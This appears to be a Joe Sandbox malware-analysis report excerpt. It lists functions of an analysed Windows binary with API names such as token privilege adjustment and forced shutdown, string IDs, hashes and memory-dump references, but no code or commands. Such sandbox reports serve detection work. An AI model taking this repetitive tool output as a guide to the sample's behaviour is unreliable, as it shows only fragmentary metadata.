                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 3769357847-24824748
                                                                                                                    • Opcode ID: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                                    • Instruction ID: 23e4f9e76a4e3f316f4c4473482997e8a5ef172c8685aa34c8eaac3066c7e07d
                                                                                                                    • Opcode Fuzzy Hash: e9a41c1307533edd4d22b0f8b30ca28bda216ecff893dec0b295dcafc10e7183
                                                                                                                    • Instruction Fuzzy Hash: 47D16F36B04A4685EB10EF6ED0806AC77B4FB6AB88B844032DF4E97769DF39D455C390
                                                                                                                    Function 00007FF7BB81793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: !$VUUU$fmod
                                                                                                                    • API String ID: 1757819995-2579133210
                                                                                                                    • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                                                    • Instruction ID: 1ee28dd65d42c1059121786f05d13df5467dbefa4fcd8be7a3317dc68c969bf6
                                                                                                                    • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                                                                    • Instruction Fuzzy Hash: 71B1F765A1EFC444D6A38A3850113B6B259BFFE390F50C336EF4E35AA8DF2C95928740
                                                                                                                    Function 00007FF7BB822D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BB822D60
                                                                                                                      • Part of subcall function 00007FF7BB81B184: GetCurrentProcess.KERNEL32(00007FF7BB81B21D), ref: 00007FF7BB81B1B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                    • String ID: *$.$.
                                                                                                                    • API String ID: 2518042432-2112782162
                                                                                                                    • Opcode ID: 12e9b60bd7894d2062c92085e89256868bb5cd1afb156a995e7c5da927ea5a3f
                                                                                                                    • Instruction ID: f6e2738110c79d5505c1809b484c3587e0379f392a15f49ecac99f223a91ea12
                                                                                                                    • Opcode Fuzzy Hash: 12e9b60bd7894d2062c92085e89256868bb5cd1afb156a995e7c5da927ea5a3f
                                                                                                                    • Instruction Fuzzy Hash: C051D462F11A5584FB10EFAD94002BDA3A4BF69BC4F944535DF0D1BBADDE38D4628350
                                                                                                                    Function 00007FF7BB8184C0 Relevance: 7.1, APIs: 4, Instructions: 1071COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1286766494-0
                                                                                                                    • Opcode ID: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                                                                    • Instruction ID: 8e299cbdd796df5cc4dd990f5f45423f66b2b5627ab4ba623d37a9766ba21810
                                                                                                                    • Opcode Fuzzy Hash: ff66785d1f33ad73d5007bcee94c477568ce16377581ab8ae86a17e1b75de420
                                                                                                                    • Instruction Fuzzy Hash: BAA2C532A0A64286E7249F2CE45117DB3A1FBAA784F944135DF4D07BACDF3DE52187A0
                                                                                                                    Function 00007FF7BB85C110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 33631002-4108050209
                                                                                                                    • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                                                    • Instruction ID: 015fe4c99af13cd3e8b5b9c44f8a86fba3fc2cbace7ee4f6d08f4cbb587a2a10
                                                                                                                    • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                                                                    • Instruction Fuzzy Hash: 4F21A332618B80C6D7208F29E48469AB7B4F795794F544226EF9D03B98CF3CD665CF50
                                                                                                                    Function 00007FF7BB85D750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50shutdownCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                    • API String ID: 2163645468-3733053543
                                                                                                                    • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                                    • Instruction ID: e83df8d2dcda7c245131404a5ea8656ad09d696e0704577ab755e45fd6e7c973
                                                                                                                    • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                                                                    • Instruction Fuzzy Hash: DA11C432B1860282EB24EB2DD48156EE256BFA1750F894135EF5D839BDEF3CD8258790
                                                                                                                    Function 00007FF7BB805BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7BB805C43
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                    • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                                    • Instruction ID: d013e2daf96419a79e2e40023691293af9e7cc58b1ace959f3decb900a014602
                                                                                                                    • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                                                                    • Instruction Fuzzy Hash: 9A115B22614B4296EB04AB6ED6553A963A4FB65385FC05135CB4D42A68EF3CE0B4C7A0
                                                                                                                    Function 00007FF7BB8532F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                    • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                                                    • Instruction ID: a6b93d6bfc66a14e324aee5e5a28eb2da313b9b17a26a9e6253f2a8c0c499e67
                                                                                                                    • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                                                                    • Instruction Fuzzy Hash: 61E0ED61905B0281EF14AB6CE4583A863E0FB2AB48FC41435DE5D46368EFBCE5B4C390
                                                                                                                    Function 00007FF7BB7F2E30 Relevance: 6.5, APIs: 2, Strings: 1, Instructions: 1264COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                                    • API String ID: 1385522511-109567571
                                                                                                                    • Opcode ID: 28f90ac2e257d6436df08bc08313024deef07c53144b9bf1108805a6d031b462
                                                                                                                    • Instruction ID: 21868a65ac7830a8945d41aa795aa0dd3b388ba9305e45964bf2716443991b64
                                                                                                                    • Opcode Fuzzy Hash: 28f90ac2e257d6436df08bc08313024deef07c53144b9bf1108805a6d031b462
                                                                                                                    • Instruction Fuzzy Hash: DCC28432A08A8286EB60AF1DD4402B9B361FB6AB84F954132DF4D577B8CF3CE455C364
                                                                                                                    Function 00007FF7BB85BE00 Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1083639309-0
                                                                                                                    • Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                                    • Instruction ID: 844427baacfc555ba2f4d2de05aaee0987fb920545f5c2d331287ecb9fcc20de
                                                                                                                    • Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
                                                                                                                    • Instruction Fuzzy Hash: B0418122A18A8291EB10FF6DE4841ADA364FB69784FC45032EF4E03679DF7CE515C750
                                                                                                                    Function 00007FF7BB7F3C20 Relevance: 5.3, APIs: 3, Instructions: 832COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1385522511-0
                                                                                                                    • Opcode ID: da6e29006f01bd698c6eac7bc6c5edd526e300c14b6c3d3e53a12b26179e677e
                                                                                                                    • Instruction ID: 0c40169a1d50492f83570d41496be3be13228de3259276fd9ace0b4fbefa9c7c
                                                                                                                    • Opcode Fuzzy Hash: da6e29006f01bd698c6eac7bc6c5edd526e300c14b6c3d3e53a12b26179e677e
                                                                                                                    • Instruction Fuzzy Hash: 99827132A08A9286EA50EF1DD484679A3A4FB6AB84F914036DF4D477B8DF3CF451C364
                                                                                                                    Function 00007FF7BB800E90 Relevance: 4.9, Strings: 3, Instructions: 1176COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $[$\
                                                                                                                    • API String ID: 0-3681541464
                                                                                                                    • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                                                                    • Instruction ID: 27d612ecaa2b1983c5694a509c1164d28af2ffd007ad918eb92803393c7769a0
                                                                                                                    • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                                                                    • Instruction Fuzzy Hash: ACB29F36B086568EE7249F6DC4406AC77B1FB26788F914136CF0D57BA8DB38E950C790
                                                                                                                    Function 00007FF7BB811750 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1502251526-0
                                                                                                                    • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                                                                    • Instruction ID: 2c827e0ad145e4e8fbbbea7aef4ab4b8db9aa4d5f2f87092aa984eae60f466cb
                                                                                                                    • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                                                                    • Instruction Fuzzy Hash: 0ED1D532B1A28687D725EF1DE18466AB7A1FBD9784F848134CF4E53B58DA3CE851CB40
                                                                                                                    Function 00007FF7BB866428 Relevance: 4.6, APIs: 3, Instructions: 116fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3541575487-0
                                                                                                                    • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                                    • Instruction ID: f3b94159a35688b6a8cd8a5c2e5f3033ca82815b0d1a6aed3fc73b211822be67
                                                                                                                    • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                                                                    • Instruction Fuzzy Hash: E6515B32608A8685DB14AF2DD0942ACB760FB9AB94F804232CF5E437B9CF3CE565C750
                                                                                                                    Function 00007FF7BB84D408 Relevance: 4.6, APIs: 3, Instructions: 71memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1766415185-0
                                                                                                                    • Opcode ID: bd9ee305005d20edf5c11873021be34db603942109d79114471410cc239d0158
                                                                                                                    • Instruction ID: f72c37d7d4b3cee01f8ad448cc46a5c98abaf0fdb98f6361d403820c4c70e4bf
                                                                                                                    • Opcode Fuzzy Hash: bd9ee305005d20edf5c11873021be34db603942109d79114471410cc239d0158
                                                                                                                    • Instruction Fuzzy Hash: BE21D333A046118AFB10EF59E4042AAA7A5FB69BD4FC64435CF5D03268DF3CE965C7A0
                                                                                                                    Function 00007FF7BB84D5CC Relevance: 4.6, APIs: 3, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2278415577-0
                                                                                                                    • Opcode ID: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                                                                    • Instruction ID: 8df7a0a2f54660ff86f462a6c2b7081b32883b5d68b1b4533f98ed0eda176c2e
                                                                                                                    • Opcode Fuzzy Hash: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                                                                    • Instruction Fuzzy Hash: F221D072608A8189EB04EF2EE44426DB7A1FB99BC4F888034CF4C03728CF78D566C390
                                                                                                                    Function 00007FF7BB84D540 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
